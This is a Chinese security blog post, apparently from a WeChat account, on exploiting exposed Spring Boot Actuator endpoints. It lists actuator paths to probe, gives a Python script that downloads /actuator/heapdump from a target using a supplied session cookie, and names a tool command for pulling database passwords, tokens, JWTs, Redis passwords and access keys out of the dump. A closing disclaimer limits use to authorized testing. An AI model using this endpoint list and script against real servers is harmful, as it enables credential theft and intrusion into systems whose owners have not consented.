夜雨聆风
浏览器直接下载被拒?换个姿势,秒拿数据库密码、Token和Redis凭证
/api/xxx/xxxapi-docsactuatoractuator/./envactuator/auditLogactuator/auditeventsactuator/autoconfigactuator/beansactuator/cachesactuator/conditionsactuator/configurationMetadataactuator/configpropsactuator/dumpactuator/envactuator/eventsactuator/exportRegisteredServicesactuator/featuresactuator/flywayactuator/healthactuator/healthcheckactuator/httptraceactuator/hystrix.streamactuator/infoactuator/integrationgraphactuator/jolokiaactuator/logfileactuator/loggersactuator/loggingConfigactuator/liquibaseactuator/metricsactuator/mappings
-
数据库账号密码 -
Token -
Session -
JWT -
Redis 密码 -
AccessKey -
内存中的敏感数据
import requests# ========== 请修改这里的配置 ==========URL = "http://你的目标地址/actuator/heapdump"COOKIE = "这里填入你的完整Cookie字符串"# ====================================# 下载配置headers = {"Cookie": COOKIE}file_name = "heapdump.hprof"try:# 流式下载大文件(避免内存溢出)with requests.get(URL, headers=headers, stream=True, timeout=300) as resp:resp.raise_for_status() # 抛出HTTP错误withopen(file_name, "wb") as f:for chunk in resp.iter_content(chunk_size=8192):f.write(chunk)print(f"✅ 下载完成!文件保存为:{file_name}")except Exception as e:print(f"❌ 下载失败:{str(e)}")
java -jar heapdump_tool.jar heapdump
Authorization: Bearer xxxxxx这类鉴权头,但将链接复制到浏览器打开时,浏览器不会自动携带授权头、自定义请求头及专属 Token,最终导致服务端判定为未登录状态。📎 获取方法
整理了一份常用工具和笔记,后台回复:资料
回复加群获取交流群
⚠️ 最后必看 – 免责声明
文章中的案例或工具仅面向合法授权的企业安全建设行为,请自行搭建靶机环境,勿用于非法行为。如用于其他用途,由使用者承担全部法律及连带责任。
本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。
如您在使用过程中存在任何非法行为,需自行承担相应后果。本工具来源于网络,若有侵权请联系删除,请勿用于商业行为!
📚 往期推荐
微信号: 关注公众号获取 | 扫码关注了解更多